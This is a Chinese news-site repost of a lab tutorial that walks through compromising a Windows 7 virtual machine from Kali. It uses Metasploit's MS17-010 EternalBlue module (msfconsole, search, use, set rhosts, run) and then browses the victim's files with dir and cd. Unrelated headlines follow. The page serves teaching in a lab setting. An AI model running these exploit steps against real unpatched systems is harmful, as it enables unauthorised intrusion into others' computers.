全球快看:原来黑客是这样获取你计算机管理员权限!「实战」

一、背景介绍

Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木马控制受害者主机呢?接下来让我们一起学习!

二、资源装备

1.安装好 Win7的虚拟机一台

2.整装待发的小白一个。


(资料图片)

3.安装好的Kali Linux虚拟机一台。

三、攻防实战

3.1 利用Metasploit(msf)渗透框架对目标主机进行攻击,如下图所示。

步骤1:启动Metasploit(msf)渗透框架,如下图所示。

命令:msfconsole

步骤2:Metasploit(msf)渗透框架启动成功,如下图所示。

步骤3:检索漏洞,如下图所示。

命令:search 漏洞编号

例子:search ms17-010

步骤4:检索到有关漏洞的利用模块如下图所示。

步骤5:选择对应的漏洞利用模块并使用,如下图所示。

命令:use 漏洞利用模块名称

例子:use exploit/windows/smb/ms17_010_eternalblue

步骤6:查看使用的漏洞模块需要设置的参数,如下图所示。。

命令:show option

步骤7:设置攻击参数,如下图所示。

命令:set rhosts 受害者主机IP

例子:set rhosts 192.168.78.160

步骤8:查看对应的参数是否设置成功,如下图所示。

命令:show options

步骤9:运行漏洞利用模块,如下图所示。

命令:run

步骤10:如下图所示,成功拿下目标主机

提示:ETERNALBLUE overwrite completed successfully!

3.2 进入后渗透阶段,利用DOS命令控制目标主机,如下图所示。

步骤1:进入Windows系统的cmd窗口,如下图所示。

步骤2:利用命令查看受害者主机的文件夹信息,如下图所示。

命令:dir

切换文件夹目录:cd 文件夹名

切换盘符:cd 盘符名

标签:

x 广告
全球快看:原来黑客是这样获取你计算机管理员权限!「实战」

一、背景介绍Metasploit就是一个漏洞框架。它的全称叫做TheMetasploitF

碳酸锂的发展历史 全球速读

碳酸锂是一种重要的化学品,广泛应用于电池、玻璃制造、冶金等领域。它

全球简讯:芝英派出所别致“枫警”谱新篇

时光在芝英镇已经流淌了一千七百多年。这里被誉为“中国祠堂古镇,江南

焦点报道:年金险交一年能全额退吗?值得购买吗?

一般不能。年金险的退保政策因保险公司和产品而异,无法一概而论。通常

德尔玛:公司暂未参与无人驾驶相关业务

暂未参与无人驾驶相关业务。

焦点热讯:国内最大电化学储能电站并网投运

国内最大电化学储能电站并网投运6月22日,在安徽省阜阳市阜南县中岗镇

山东高速驶入高质量发展“快车道”

6月20日,在遍布视频传感器、毫米波雷达等感应设备的高速公路上,赢彻

2023年进出口贸易受益股有哪些?(6月25日)_环球消息

2023年进出口贸易受益股有哪些?(6月25日),2023年进出口贸易受益股有

说实话,夏天想提升气质还得穿“过膝裙”,配高跟鞋和平底鞋都很高级-环球热推荐

像这些时尚博主,通过用过膝连衣裙去凹造型,就可以打造出一套很洋气的

惊险!马路中间悬挂一根电缆 摩托车骑手经过刚好被套住脖子

6月21日,四川宜宾,一根电缆横挂在马路中间,摩托车司机未留意,直接

x 广告

Copyright ©  2015-2023 亚洲都市网版权所有  备案号:京ICP备2021034106号-51   联系邮箱:5 516 538 @qq.com